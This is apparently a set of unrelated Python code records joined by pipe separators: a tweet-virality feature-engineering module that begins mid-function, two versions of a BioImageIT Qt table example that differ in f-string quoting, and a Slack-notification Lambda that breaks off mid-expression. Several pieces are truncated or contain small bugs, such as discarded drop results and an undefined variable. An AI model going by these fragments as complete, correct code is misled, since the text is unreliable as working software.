# counts_df = pd.DataFrame(index=range(tweet_user_ids), columns=counts_df_cols)
# counts_df['tweet_user_id'] = tweet_user_ids
counts_map = df.groupby('tweet_user_id')[feat_].apply(lambda x: x.value_counts())
counts_map = counts_map.unstack(level=1)
counts_map.columns = [f"tweets_in_{feat_.split('_')[-1]}_"+str(col) for col in counts_map.columns]
counts_map = counts_map.fillna(0).reset_index()
df = df.merge(counts_map, how='left', on='tweet_user_id')
return df
# n_tweets_time_user = df.groupby('tweet_user_id')[feat_].count().reset_index()
# n_tweets_time_user.columns = ['tweet_user_id', f"n_tweets_{feat_.split('_')[-1]}_user_count"]
# df = df.merge(n_tweets_time_user, how='left', on='tweet_user_id')
def create_date_col(df):
tweet_date_cols = ['tweet_created_at_year', 'tweet_created_at_month', 'tweet_created_at_day']
df['date'] = df[tweet_date_cols].apply(lambda x:
str(x['tweet_created_at_month']).strip() + '/' +
str(x['tweet_created_at_day']).strip() + '/' +
str(x['tweet_created_at_year']).strip(), axis=1)
df['date'] = pd.to_datetime(df['date'])
return df
def add_sincos(df):
hour_sine = np.sin(2 * np.pi * df['tweet_created_at_hour'] / 24.0)
hour_sine.name = 'sin_hour'
hour_cosine = np.cos(2 * np.pi * df['tweet_created_at_hour'] / 24.0)
hour_cosine.name = 'cos_hour'
df = df.join([hour_sine, hour_cosine])
return df
def add_dummy_dates(df):
year = pd.get_dummies(df.tweet_created_at_year, prefix='ohe_year')
month = pd.get_dummies(df.tweet_created_at_month, prefix='ohe_month')
day = pd.get_dummies(df.tweet_created_at_day, prefix='ohe_day')
user_year = pd.get_dummies(df.user_created_at_year, prefix='ohe_user_year')
user_month = pd.get_dummies(df.user_created_at_month, prefix='ohe_user_month')
df = df.join([year, month, day, user_year, user_month])
return df
def add_date_feats(df):
# todo OHE date
# todo to sin, cos(date)
#df_old_index = df.index
df = create_date_col(df)
df = add_sincos(df)
df = add_dummy_dates(df)
cols_resample = ['tweet_hashtag_count', 'tweet_url_count', 'tweet_mention_count',
]
date_freqs = ['1Q'] # ,'1M']
# todo DON't use _func_min if does not affect CV (low feat importance)
stats = ['sum','mean','std','max'] # ['mean', 'max', 'min', 'median', 'std']
for freq_ in date_freqs:
for stat_ in stats:
df.set_index('date', inplace=True)
g = (df.groupby('tweet_user_id').resample(freq_, closed='left')
[cols_resample].agg(stat_)
.astype(np.float32)
) # .set_index('date'))
g = g.unstack('date').fillna(0)
g.columns = [col1 + f'_func_{stat_}_' + col2.strftime('%Y-%m-%d') for (col1, col2) in g.columns]
g.reset_index(inplace=True)
# g = g.rename(columns ={col: f"{col}_rsmpl_{freq_}_func_{stat_}"
# for col in g.columns if col not in ['tweet_user_id','date']})
#df = df.reset_index().merge(g, how='left', on='tweet_user_id')
df = df.reset_index().merge(g, how='left', on='tweet_user_id')
# df.reset_index(drop=False, inplace=True)
# todo count 'tweet_id' for each period for user
today = pd.to_datetime('7/1/2021')
df['days_since_tweet'] = (today - df['date']).dt.days # .astype(int)
df['user_followers_count_2days'] = df['user_followers_count'] / df['days_since_tweet']
df['user_following_count_2days'] = df['user_following_count'] / df['days_since_tweet']
df['user_listed_on_count_2days'] = df['user_listed_on_count'] / df['days_since_tweet']
df['user_tweet_count_2days'] = df['user_tweet_count'] / df['days_since_tweet']
df['tweet_hashtag_count_2days'] = df['tweet_hashtag_count'] / df['days_since_tweet']
df['tweet_mention_count_2days'] = df['tweet_mention_count'] / df['days_since_tweet']
df['tweet_url_count_2days'] = df['tweet_url_count'] / df['days_since_tweet']
# todo not a date related functions:
df['tweet_mention_count_div_followers'] = df['tweet_mention_count'].divide(df['user_followers_count']+1)
df['tweet_url_count_div_followers'] = df['tweet_url_count'].divide(df['user_followers_count']+1)
df['tweet_hashtag_count_div_followers'] = df['tweet_hashtag_count'].divide(df['user_followers_count']+1)
df['tweet_mention_count_div_followers'] = df['tweet_mention_count'].divide(df['user_followers_count']+1)
df['tweet_mention_count_div_n_tweets'] = df['tweet_mention_count'].divide(df['user_tweet_count']+1)
df['tweet_url_count_div_n_tweets'] = df['tweet_url_count'].divide(df['user_tweet_count']+1)
df['tweet_hashtag_count_div_n_tweets'] = df['tweet_hashtag_count'].divide(df['user_tweet_count']+1)
df['tweet_mention_count_div_n_tweets'] = df['tweet_mention_count'].divide(df['user_tweet_count']+1)
df['tweet_mention_count_div_likes'] = df['tweet_mention_count'].divide(df['user_like_count']+1)
df['tweet_url_count_div_likes'] = df['tweet_url_count'].divide(df['user_like_count']+1)
df['tweet_hashtag_count_div_likes'] = df['tweet_hashtag_count'].divide(df['user_like_count']+1)
df['tweet_mention_count_div_likes'] = df['tweet_mention_count'].divide(df['user_like_count']+1)
cols_drop = ['date', 'tweet_created_at_year', 'tweet_created_at_month',
'tweet_created_at_day',
'user_created_at_year', 'user_created_at_month']
df.drop(cols_drop, axis=1, inplace=True)
return df
def ohe_func(df, cat_col, ohe_tfm=LabelBinarizer(), prefix=None):
""" OHE one categorical column of df, and return df with columns 'label_{range(1,x}' added
"""
# ohe.iloc[:, df['tweet_language_id'].tolist()]
ohe_tfm.fit(df[cat_col])
ohe_transformed = ohe_tfm.transform(df[cat_col])
if prefix:
cat_cols = [f'{prefix}_{cat_col}_{i}' for i in range(ohe_transformed.shape[1])]
else:
cat_cols = [f'{cat_col}_{i}' for i in range(ohe_transformed.shape[1])]
ohe_df = pd.DataFrame(ohe_transformed, index=df.index, columns=cat_cols)
df = pd.concat([df, ohe_df], axis=1)
df.drop(cat_col, axis=1, inplace=True)
return df
def drop_unnecessary_cols(cfg, df):
cols_drop = [] # 'tweet_created_at_year', 'tweet_created_at_month',
# 'tweet_created_at_day']
# 'days_since_user', 'user_created_at_year', 'user_created_at_month',
# 'user_verified', 'user_has_url']
if cfg.drop_rare_ohe_language_ids and cfg.one_hot_encode:
lang_leave_ids = [0, 1, 3]
cols_drop += [f'tweet_language_id_{i}' for i in range(31)
if i not in lang_leave_ids
]
for col in cols_drop:
if col in df.columns:
df.drop(col, axis=1, inplace=True)
# print(f"Dropped col: {col}")
return df
class Features():
def __init__(self,):
self.transformers = {}
self.impute_img_feature_nulls = -1
self.media_img_feat_cols = []
self.text_feat_cols = []
self.user_des_feat_cols = []
self.user_img_feat_cols = []
# union of topic ids in train and test , 0 - nan value, min=36, max=172
# xor train, test = [ 38, 117, 123, 165]
# in test but not in train = [ 38, 117, 123]
self.unique_topic_ids = [ 0, 36, 37, 38, 39, 43, 44, 45, 52, 58, 59, 60, 61,
63, 68, 71, 72, 73, 78, 79, 80, 81, 82, 87, 88, 89,
91, 93, 98, 99, 100, 101, 104, 111, 112, 117, 118, 119, 120,
121, 122, 123, 125, 126, 127, 147, 148, 149, 150, 151, 152, 153,
155, 156, 163, 165, 169, 170, 171, 172]
self.cols2int8 = ['fold', 'user_created_at_month', 'tweet_created_at_day', 'tweet_created_at_hour',
'tweet_hashtag_count', 'tweet_url_count', 'tweet_mention_count', 'tweet_has_attachment',
'virality', 'tweet_has_media', 'user_has_url', 'user_verified', 'num_media',
'user_id', 'tweet_user_id']
# 'tweet_created_at_year', 'user_created_at_year',
self.cols2int8 += [f'tweet_language_id_{i}' for i in range(30)]
def get_data_stage1(self, cfg, base_dir, n_samples=int(1e10)):
df = pd.read_csv(osj(base_dir, 'Tweets',f'train_tweets.csv'), nrows=n_samples)
test = pd.read_csv(osj(base_dir, 'Tweets',f'test_tweets.csv'), nrows=n_samples)
# test_tweet_ids = test['tweet_id'].to_list()
# self.tabular_feats.append()
df = pd.concat([df, test])
del test; _ = gc.collect()
df = change2float32(df)
df = self.optimize_ints(df)
#df.drop('tweet_attachment_class', axis=1, inplace=True)
# try using 'media_id' columns
df_media = pd.read_csv(osj(base_dir, 'Tweets',f'train_tweets_vectorized_media.csv'))
df_media_test = pd.read_csv(osj(base_dir, 'Tweets',f'test_tweets_vectorized_media.csv'))
df_media = pd.concat([df_media, df_media_test])
df_media = change2float32(df_media)
df = merge_df2media(df, df_media)
del df_media, df_media_test; _ = gc.collect()
df_text = pd.read_csv(osj(base_dir, 'Tweets',f'train_tweets_vectorized_text.csv'))
df_text_test = pd.read_csv(osj(base_dir, 'Tweets',f'test_tweets_vectorized_text.csv'))
df_text = pd.concat([df_text, df_text_test])
text_feat_cols = ['text_'+ col for col in df_text.columns if col.startswith('feature_')]
df_text.columns = ['tweet_id'] + text_feat_cols
df_text.loc[:, text_feat_cols] = np.log(df_text[text_feat_cols] + 13)
df_text = change2float32(df_text)
df = df.merge(df_text, how='left', on='tweet_id')
del df_text, df_text_test; _ = gc.collect()
users = pd.read_csv(osj(base_dir, 'Users','users.csv'))
# log of _count feats
users_des = pd.read_csv(osj(base_dir, 'Users','user_vectorized_descriptions.csv'))
# for col in ['tweet_hashtag_count','tweet_url_count','tweet_mention_count']:
# users[col] = users[col].astype(int)
users_img = pd.read_csv(osj(base_dir, 'Users','user_vectorized_profile_images.csv'))
user_des_feat_cols = ['user_des_'+col for col in users_des.columns if col.startswith('feature')]
users_des.columns = ['user_id'] + user_des_feat_cols
user_img_feat_cols = ['user_img_'+col for col in users_img.columns if col.startswith('feature')]
users_img.columns = ['user_id'] + user_img_feat_cols
# user_data = users # .merge(users, how='left', on='user_id')
user_data = users.merge(users_des, how='left', on='user_id')
user_data = user_data.merge(users_img, how='left', on='user_id')
user_data = change2float32(user_data)
user_data = self.optimize_ints(user_data) # # no nulls in user_data 25-may
df = df.merge(user_data, how='left', left_on='tweet_user_id', right_on='user_id')
df.drop('user_id', axis=1, inplace=True)
df = cond_drop_imgtext(cfg, df)
# df = add_num_media_user(df)
del users_des, users_img, user_data;
_ = gc.collect()
return df # , test_tweet_ids
def get_data_stage2(self, cfg, df):
df = tweets_user_created_date(df) # add feats: number of user tweets in time period (year, month, day, hour)
df = add_date_feats(df)
df = bin_feats(df, feats=['tweet_mention_count','user_tweet_count',
'user_followers_count','user_following_count',
'user_listed_on_count'])
df = add_topic_count(df)
df = add_topic_ids(df)
bool_cols = df.select_dtypes(include='bool').columns
df[bool_cols] = df[bool_cols].astype(np.int8)
if cfg.one_hot_encode:
df = ohe_func(df, cat_col='tweet_language_id', ohe_tfm=LabelBinarizer())
df = ohe_func(df, cat_col='tweet_attachment_class', ohe_tfm=LabelBinarizer())
else:
df['tweet_attachment_class'] = df['tweet_attachment_class'].astype('category').cat.codes
# df = to_binary_categories(df, cat_col='tweet_language_id')
media_img_feat_cols = [col for col in df.columns if col.startswith('img_feature_')]
if cfg.impute_nulls:
df.loc[:,media_img_feat_cols] = df[media_img_feat_cols].fillna(self.impute_img_feature_nulls)
if cfg.add_user_virality:
df = self.add_virality_feature(df)
df = freq_encoding(df, freq_cols=['tweet_user_id'], main_col='tweet_id')
df = drop_unnecessary_cols(cfg, df)
# log (feats) :
cols2log = ['user_like_count','user_followers_count',
'user_following_count', 'user_listed_on_count',
'user_tweet_count']
# 'tweet_hashtag_count' , 'tweet_url_count', 'tweet_mention_count'
cols2log = [col for col in df.columns if col in cols2log]
df = logtransform(df, cols2log)
# print("df.shape after merging all csv files:", df.shape)
# print("df.dtypes.value_counts():\n", df.dtypes.value_counts())
# train = df[~df['tweet_id'].isin(test_tweet_ids)]
# test = df[df['tweet_id'].isin(test_tweet_ids)]
train = df[~df['virality'].isnull()]
test = df[df['virality'].isnull()]
del test['virality']; _ = gc.collect()
print(f"train.shape = {train.shape}, test.shape = {test.shape}")
return train, test
# end of def get_data
def add_virality_feature(self, df):
df_train = df[~df['virality'].isnull()]
viral_user = df_train.groupby('tweet_user_id')['virality'].mean().reset_index()
viral_user.columns = ['tweet_user_id', 'user_virality']
df = df.merge(viral_user, how='left', on='tweet_user_id')
return df
def optimize_ints(self, df):
int8_candidates = self.cols2int8
# for col in ['tweet_created_at_year', 'user_created_at_year']:
# if col in df.columns:
# df.loc[:, col] = df.loc[:, col] - 2000
# df.loc[:, col] = df.loc[:, col].astype(np.int8)
for col in int8_candidates:
if (col in df.columns) and (df[col].isnull().sum()==0):
df.loc[:, col] = df.loc[:, col].astype(np.int8)
return df
# end of class Features
def logtransform(df, cols2log):
df.loc[:, cols2log] = np.log(df[cols2log] + 2)
return df
class NormalizeFeats_Parallel():
""" https://scikit-learn.org/stable/computing/parallelism.html
from joblib import parallel_backend
with parallel_backend('threading', n_jobs=2):
# Your scikit-learn code here
"""
def __init__(self, feat_cols: list):
self.feat_cols = feat_cols
self.scalers_dict = {}
def normalize_data(self, df, mode='train', scaler=StandardScaler()):
if mode =='train':
for col in self.feat_cols:
with parallel_backend('threading', n_jobs=n_cpus):
scaler.fit(df[col].values.reshape(-1,1))
self.scalers_dict[col] = scaler
# scaler.fit(df[feat_cols].values)
df.loc[:,col] = self.scalers_dict[col].transform(df[col].values.reshape(-1,1))
else:
for col in self.feat_cols:
with parallel_backend('threading', n_jobs=n_cpus):
df.loc[:,col] = self.scalers_dict[col].transform(df[col].values.reshape(-1,1))
return df
# end of NormalizeFeats class
class NormalizeFeats():
def __init__(self, feat_cols: list):
self.feat_cols = feat_cols
self.scalers_dict = {}
def normalize_data(self, df, mode='train', scaler=StandardScaler()):
if mode =='train':
for col in self.feat_cols:
scaler.fit(df[col].values.reshape(-1,1))
self.scalers_dict[col] = scaler
# scaler.fit(df[feat_cols].values)
df.loc[:,col] = self.scalers_dict[col].transform(df[col].values.reshape(-1,1))
else:
for col in self.feat_cols:
df.loc[:,col] = self.scalers_dict[col].transform(df[col].values.reshape(-1,1))
return df
# end of NormalizeFeats class
def transform_joint(train, test=None, norm_cols=None, tfm = StandardScaler()):
# normalize joint train test data in chunks by columns
l_train = len(train)
if len(norm_cols) < 1000:
if isinstance(test, pd.DataFrame):
assert train[norm_cols].columns.equals(test[norm_cols].columns)
data = pd.concat([train[norm_cols], test[norm_cols]]).values
else:
data = train[norm_cols].values
with parallel_backend('threading', n_jobs=n_cpus):
tfm.fit(data)
data = tfm.transform(data)
train.loc[:, norm_cols] = data[:l_train]
if isinstance(test, pd.DataFrame):
test.loc[:, norm_cols] = data[l_train:]
else: # len(norm_cols) >= 1000
all_col_chunks = [norm_cols[i:i+1000] for i in range(0, len(norm_cols), 1000)]
for cols_chunk in all_col_chunks:
if isinstance(test, pd.DataFrame):
assert train[norm_cols].columns.equals(test[norm_cols].columns)
data_chunk = pd.concat([train[cols_chunk], test[cols_chunk]]).values
else:
data_chunk = train[cols_chunk]
scaler = StandardScaler()
with parallel_backend('threading', n_jobs=n_cpus):
tfm.fit(data_chunk)
data_chunk = tfm.transform(data_chunk)
train.loc[:, cols_chunk] = data_chunk[:l_train] # todo LONGEST RUNTIME and memory
if isinstance(test, pd.DataFrame):
test.loc[:, cols_chunk] = data_chunk[l_train:] # todo LONGEST RUNTIME and memory
return train, test # test cab be None
def normalize_npnan(train, test=None, norm_cols=[]):
if len(norm_cols)==0:
raise NotImplementedError
l_train = len(train)
if len(norm_cols) < 1000:
if isinstance(test, pd.DataFrame):
# assert train[norm_cols].columns.equals(test[norm_cols].columns)
data = pd.concat([train[norm_cols], test[norm_cols]]).values
else:
data = train[norm_cols].values
data = (data - np.nanmean(data, axis=0))/np.nanstd(data, axis=0)
train.loc[:, norm_cols] = data[:l_train]
if isinstance(test, pd.DataFrame):
test.loc[:, norm_cols] = data[l_train:]
else: # len(norm_cols) >= 1000
all_col_chunks = [norm_cols[i:i + 1000] for i in range(0, len(norm_cols), 1000)]
for cols_chunk in all_col_chunks:
if isinstance(test, pd.DataFrame):
# assert train[norm_cols].columns.equals(test[norm_cols].columns)
data_chunk = pd.concat([train[cols_chunk], test[cols_chunk]]).values
else:
data_chunk = train[cols_chunk]
data_chunk = (data_chunk - np.nanmean(data_chunk, axis=0))/np.nanstd(data_chunk, axis=0)
train.loc[:, cols_chunk] = data_chunk[:l_train] # todo LONGEST RUNTIME and memory
if isinstance(test, pd.DataFrame):
test.loc[:, cols_chunk] = data_chunk[l_train:] # todo LONGEST RUNTIME and memory
return train, test # test cab be None
def normalize_joint(train, test=None, norm_cols=None):
# normalize joint train test data in chunks by columns
l_train = len(train)
if len(norm_cols) < 1000:
if isinstance(test, pd.DataFrame):
assert train[norm_cols].columns.equals(test[norm_cols].columns)
data = pd.concat([train[norm_cols], test[norm_cols]]).values
else:
data = train[norm_cols].values
scaler = StandardScaler()
with parallel_backend('threading', n_jobs=n_cpus):
scaler.fit(data)
data = scaler.transform(data)
train.loc[:, norm_cols] = data[:l_train]
if isinstance(test, pd.DataFrame):
test.loc[:, norm_cols] = data[l_train:]
else: # len(norm_cols) >= 1000
all_col_chunks = [norm_cols[i:i+1000] for i in range(0, len(norm_cols), 1000)]
for cols_chunk in all_col_chunks:
if isinstance(test, pd.DataFrame):
assert train[norm_cols].columns.equals(test[norm_cols].columns)
data_chunk = pd.concat([train[cols_chunk], test[cols_chunk]]).values
else:
data_chunk = train[cols_chunk]
scaler = StandardScaler()
with parallel_backend('threading', n_jobs=n_cpus):
scaler.fit(data_chunk)
data_chunk = scaler.transform(data_chunk)
train.loc[:, cols_chunk] = data_chunk[:l_train] # todo LONGEST RUNTIME and memory
if isinstance(test, pd.DataFrame):
test.loc[:, cols_chunk] = data_chunk[l_train:] # todo LONGEST RUNTIME and memory
return train, test # test cab be None
def normalize_joint_parallel(train, test, norm_cols, num_workers=6):
# normalize joint train test data in chunks by columns
from joblib import Parallel, delayed
l_train = len(train)
assert train[norm_cols].columns.equals(test[norm_cols].columns)
if len(norm_cols) < 1000:
data = pd.concat([train[norm_cols], test[norm_cols]]).values
scaler = StandardScaler()
with parallel_backend('threading', n_jobs=n_cpus):
scaler.fit(data)
data = scaler.transform(data)
train.loc[:, norm_cols] = data[:l_train]
test.loc[:, norm_cols] = data[l_train:]
else: # len(norm_cols) >= 1000
all_col_chunks = [norm_cols[i:i+1000] for i in range(0, len(norm_cols), 1000)]
for cols_chunk in all_col_chunks:
data_chunk = pd.concat([train[cols_chunk], test[cols_chunk]]).values
scaler = StandardScaler()
with parallel_backend('threading', n_jobs=n_cpus):
scaler.fit(data_chunk)
data_chunk = scaler.transform(data_chunk)
train.loc[:, cols_chunk] = data_chunk[:l_train] # todo LONGEST RUNTIME and memory
test.loc[:, cols_chunk] = data_chunk[l_train:] # todo LONGEST RUNTIME and memory
return train, test
def split2folds_user_viral(df, n_folds, seed_folds, label_cols=None, foldnum_col='fold'):
# df is added foldnum_col='fold' column based on KFoldMethod = StratifiedKFold class
# applied to label_col='label' column
temp_col = label_cols[0] + "_" + label_cols[1]
df[temp_col] = df[label_cols[0]].astype(str) + "_" + df[label_cols[1]].astype(str)
df[temp_col] =df[temp_col].astype('category')
skf = StratifiedKFold(n_splits=n_folds, shuffle=True, random_state=seed_folds)
df[foldnum_col] = np.nan
for fold, (train_idx, val_idx) in enumerate(skf.split(np.zeros(df.shape[0]), df[temp_col])):
df.iloc[val_idx, df.columns.get_loc(foldnum_col)] = fold
df[foldnum_col] = df[foldnum_col].astype(int)
# assert df.isnull().sum().sum() == 0, "Error: null values in df"
del df[temp_col]
return df
def split2folds_viral_only(df, n_folds, seed_folds, label_col='label', foldnum_col='fold'):
# df is added foldnum_col='fold' column based on KFoldMethod = StratifiedKFold class
# applied to label_col='label' column
skf = StratifiedKFold(n_splits=n_folds, shuffle=True, random_state=seed_folds)
df[foldnum_col] = np.nan
for fold, (train_idx, val_idx) in enumerate(skf.split(df.values[:,:1], df[label_col])):
df.iloc[val_idx, df.columns.get_loc(foldnum_col)] = fold
df[foldnum_col] = df[foldnum_col].astype(int)
# assert df.isnull().sum().sum() == 0, "Error: null values in df"
return df
def split2folds_simple(df, n_folds, seed_folds, foldnum_col='fold'):
# df is added foldnum_col='fold' column based on KFoldMethod = StratifiedKFold class
# applied to label_col='label' column
skf = KFold(n_splits=n_folds, shuffle=True, random_state=seed_folds)
df[foldnum_col] = np.nan
for fold, (train_idx, val_idx) in enumerate(skf.split(df.values[:,:1])):
df.iloc[val_idx, df.columns.get_loc(foldnum_col)] = fold
df[foldnum_col] = df[foldnum_col].astype(int)
# assert df.isnull().sum().sum() == 0, "Error: null values in df"
return df
def get_folds(cfg, train, default_seed_folds=24):
# if cfg.seed_folds == default_seed_folds:
# folds = pd.read_csv(cfg.folds_split_path)
# if 'fold' in train.columns:
# del train['fold']
# train = train.merge(folds, how='left', on='tweet_id')
# train.dropna(0, subset=['fold'], inplace=True)
# else:
if cfg.folds_split_method == 'user_viral':
train = split2folds_user_viral(train, cfg.n_folds, cfg.seed_folds,
label_cols=['tweet_user_id', 'virality'], foldnum_col='fold')
return train
def get_feat_cols(train):
feat_cols = [col for col in train.columns if (col not in ['virality', 'tweet_id',
'fold','is_test'])
and not col.startswith('target_')]
media_img_feat_cols = [col for col in train.columns if col.startswith('img_feature')]
text_feat_cols = [col for col in train.columns if col.startswith('text_feature')]
user_des_feat_cols = [col for col in train.columns if col.startswith('user_des_feature')]
user_img_feat_cols = [col for col in train.columns if col.startswith('user_img_feature')]
feats_some = [col for col in feat_cols if not col in media_img_feat_cols +
text_feat_cols + user_img_feat_cols + user_des_feat_cols]
# print(f"Null values:\n{train[feat_cols].isnull().sum().sort_values(ascending=False).head(2)}")
return (feat_cols, media_img_feat_cols, text_feat_cols,
user_des_feat_cols, user_img_feat_cols, feats_some)
def cond_drop_imgtext(cfg, df):
(feat_cols, media_img_feat_cols, text_feat_cols,
user_des_feat_cols, user_img_feat_cols, feats_some) = get_feat_cols(df)
if cfg.drop_media_img_feats:
df.drop(media_img_feat_cols, axis=1, inplace=True)
if cfg.drop_text_feats:
df.drop(text_feat_cols, axis=1, inplace=True)
if cfg.drop_user_des_feats:
df.drop(user_des_feat_cols, axis=1, inplace=True)
if cfg.drop_user_img_feats:
df.drop(user_img_feat_cols, axis=1, inplace=True)
return df
def add_topic_count(df):
# and drop the column
nan_replace = '0'
topics = df['tweet_topic_ids'].fillna(f'[{nan_replace}]')
# topics_xnan = train['tweet_topic_ids'].dropna()
# fill_value = topicsx_xnan.apply(lambda x: len(eval(x))).mean()
# fill_value = topicx_xnan.apply(lambda x: len(eval(x))).median()
n_topics = topics.apply(lambda x: len(eval(x)))
n_topics_mean = n_topics.mean()
n_topics = np.where(topics == nan_replace, n_topics_mean, n_topics)
df['n_topics'] = n_topics.astype(int)
return df
def add_topic_ids(df):
df.fillna({'tweet_topic_ids': "['0']"}, inplace=True)
topic_ids = (
df['tweet_topic_ids'].str.strip('[]').str.split('\s*,\s*').explode()
.str.get_dummies().sum(level=0).add_prefix('topic_id_')
)
topic_ids.rename(columns=lambda x: x.replace("'", ""), inplace=True)
if 'tweet_topic_ids' in df.columns:
df.drop('tweet_topic_ids', 1)
df = df.join(topic_ids) # , how='left', on='tweet_id')
for col_ in topic_ids.columns:
if df[col_].max() > 1:
df[f"{col_}_hthan1_binary"] = (df[col_] > 0).astype(np.int8)
df.drop('tweet_topic_ids',1, inplace=True)
return df
#
# def replace_add_new_topic_ids(train, test):
# # add topic_id cols (57) with number of times the topic is in the sample
# # add _binary cols (45) where =1 if topic_id is more than once
# old_topic_id_cols = [col for col in train.columns if 'topic_id' in col]
# print(f"old_topic_id_cols: {old_topic_id_cols}")
# len_train = train.shape[0]
# train = pd.concat([train, test]).reset_index(drop=True)
# del test;
# _ = gc.collect()
# train.drop(old_topic_id_cols, axis=1, inplace=True)
# train, new_topic_id_cols = add_new_topic_ids(base_dir, train, df_name='train_test')
# # todo cols ['topic_id_117' 'topic_id_123' 'topic_id_38'] are not in new_topic_id_cols
# # done: only one sample==1 for each topic_id_117 topic_id_123 topic_id_38 [0 42274 42274 42274] [1 1 1 1]
# for col_ in new_topic_id_cols:
# if train[col_].max() > 1:
# train[f"{col_}_hthan1_binary"] = (train[col_] > 0).astype(np.int8)
# # train.drop(col_, axis=1, inplace=True)
# test = train.iloc[len_train:, :].reset_index(drop=True)
# train = train.iloc[:len_train, :]
# return train, test
def extract_feats_media_text(df):
# todo extact_feats_media_text
# Set the target as well as dependent variables from image data.
y = vectorized_media_df['virality']
x = vectorized_media_df.loc[:, vectorized_media_df.columns.str.contains("img_")]
# Run Lasso regression for feature selection.
sel_model = SelectFromModel(LogisticRegression(C=1, penalty='l1', solver='liblinear'))
# time the model fitting
start = timeit.default_timer()
# Fit the trained model on our data
sel_model.fit(x, y)
stop = timeit.default_timer()
print('Time: ', stop - start)
# get index of good features
sel_index = sel_model.get_support()
# count the no of columns selected
counter = collections.Counter(sel_model.get_support())
print(counter)
def save_preprocessed(cfg, train, test, path_train, path_test):
# p_train = cfg.train_preprocessed_path
# p_test = cfg.test_preprocessed_path
# if cfg.debug:
# path_train = osj(os.path.dirname(p_train), 'debug_' + os.path.basename(path_train))
# path_test = osj(os.path.dirname(p_test), 'debug_' + os.path.basename(path_test))
assert not os.path.isfile(path_train), f"WON'T OVERWRITE/SAVE: file exists {os.path.basename(path_train)}"
assert not os.path.isfile(path_test), f"WON'T OVERWRITE/SAVE: file exists {os.path.basename(path_test)}"
train.to_csv(path_train, index=False)
test.to_csv(path_test, index=False)
def get_raw_train_tweet_cols(df):
# get cols from train_tweets.csv and users.csv
init_tweets_cols = ['tweet_id', 'tweet_user_id', 'tweet_created_at_year',
'tweet_created_at_month', 'tweet_created_at_day',
'tweet_created_at_hour', 'tweet_hashtag_count', 'tweet_url_count',
'tweet_mention_count', 'tweet_has_attachment', 'tweet_attachment_class',
'tweet_language_id', 'tweet_topic_ids', 'virality']
init_users_cols = ['user_id', 'user_like_count', 'user_followers_count',
'user_following_count', 'user_listed_on_count', 'user_has_location',
'user_tweet_count', 'user_has_url', 'user_verified',
'user_created_at_year', 'user_created_at_month']
def add_new_topic_ids(base_dir, df, df_name='train'):
if df_name=='train_test':
df_tweets = pd.read_csv(osj(base_dir, 'Tweets', f'train_tweets.csv'),
usecols=['tweet_id', 'tweet_topic_ids']
)
df_tweets_test = pd.read_csv(osj(base_dir, 'Tweets', f'test_tweets.csv'),
usecols=['tweet_id', 'tweet_topic_ids']
)
df_tweets = pd.concat([df_tweets, df_tweets_test]).reset_index(drop=True)
# df_tweets = df.reindex(df.index)
else:
df_tweets = pd.read_csv(osj(base_dir, 'Tweets', f'{df_name}_tweets.csv'),
usecols=['tweet_id', 'tweet_topic_ids']
)
df_tweets.fillna({'tweet_topic_ids': "['0']"}, inplace=True)
topic_ids = (
df_tweets['tweet_topic_ids'].str.strip('[]').str.split('\s*,\s*').explode()
.str.get_dummies().sum(level=0).add_prefix('topic_id_')
)
topic_ids.rename(columns=lambda x: x.replace("'", ""), inplace=True)
topic_ids['tweet_id'] = df_tweets['tweet_id']
if 'tweet_topic_ids' in df.columns:
df.drop('tweet_topic_ids')
df = df.merge(topic_ids, how='left', on='tweet_id')
return df, list(topic_ids.columns)
|
import sys
import os
from qtpy.QtWidgets import QApplication
from bioimageit_framework.theme import BiThemeAccess, BiThemeSheets
from bioimageit_framework.widgets import BiWidget, BiTable, showInfoBox
class MyExampleTable(BiWidget):
"""Create a table with an open button in the first row
Parameters
----------
header: list
List of the header labels
data: ndarray
data matrix
"""
def __init__(self, headers, data):
self.table = BiTable()
self.widget = self.table.widget
self.table.prepare_header(headers)
self.table.prepare_data(data)
self.table.prepare_col_button(0, 'primary', 'Open', self.open)
self.table.build()
def open(self, emitter):
showInfoBox(f'you clicked the button open row {emitter.content['row']}')
if __name__ == '__main__':
# Create the Qt Application
app = QApplication(["BioImageIT"])
dir_path = os.path.dirname(os.path.realpath(__file__))
# load and set the theme
BiThemeAccess(os.path.join(dir_path, '..', 'theme', 'dark'))
BiThemeAccess.instance().set_stylesheet(app, BiThemeSheets.sheets())
headers = ['', 'x', 'y', 'z']
data = [[12, 26, 2], [14, 27, 3], [16, 28, 4]]
table = MyExampleTable(headers, data)
table.widget.show()
# Run the main Qt loop
sys.exit(app.exec_())
| import sys
import os
from qtpy.QtWidgets import QApplication
from bioimageit_framework.theme import BiThemeAccess, BiThemeSheets
from bioimageit_framework.widgets import BiWidget, BiTable, showInfoBox
class MyExampleTable(BiWidget):
"""Create a table with an open button in the first row
Parameters
----------
header: list
List of the header labels
data: ndarray
data matrix
"""
def __init__(self, headers, data):
self.table = BiTable()
self.widget = self.table.widget
self.table.prepare_header(headers)
self.table.prepare_data(data)
self.table.prepare_col_button(0, 'primary', 'Open', self.open)
self.table.build()
def open(self, emitter):
showInfoBox(f'you clicked the button open row {emitter.content["row"]}')
if __name__ == '__main__':
# Create the Qt Application
app = QApplication(["BioImageIT"])
dir_path = os.path.dirname(os.path.realpath(__file__))
# load and set the theme
BiThemeAccess(os.path.join(dir_path, '..', 'theme', 'dark'))
BiThemeAccess.instance().set_stylesheet(app, BiThemeSheets.sheets())
headers = ['', 'x', 'y', 'z']
data = [[12, 26, 2], [14, 27, 3], [16, 28, 4]]
table = MyExampleTable(headers, data)
table.widget.show()
# Run the main Qt loop
sys.exit(app.exec_())
|
import json
import logging
import os
import requests
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def notify_horoscope_success_to_slack(event: dict, context) -> dict:
logger.info(f"event={event}")
title = "storing horoscope is success:smile:"
messages = [
f"job_id: {event["job_id"]}",
f"backend_name: {event["backend_name"]}",
f"creation_date: {event["creation_date"]} UTC",
]
_post_slack(title, "good", "\n".join(messages))
return event
def notify_horoscope_failed_to_slack(event: dict, context) -> dict:
logger.info(f"event={event}")
title = "storing horoscope is failure:rage:"
messages = ["Check detail!"]
if "detail" in event and "status" in event["detail"]:
messages.append(f'status: {event['detail']['status']}')
_post_slack(title, "danger", "\n".join(messages))
return event
def notify_horoscope_update_to_slack(event: dict, context) -> dict:
logger.info(f"event={event}")
title = "updating horoscope is success:smile:"
filtered_result = {int(k[4:]): v for k, v in event.items() if k.startswith("rank")}
sorted_result = sorted(filtered_result.items(), key=lambda x: x[0])
result = [
str(x[0])
+ ": "
+ x[1]
.replace(" ", "")
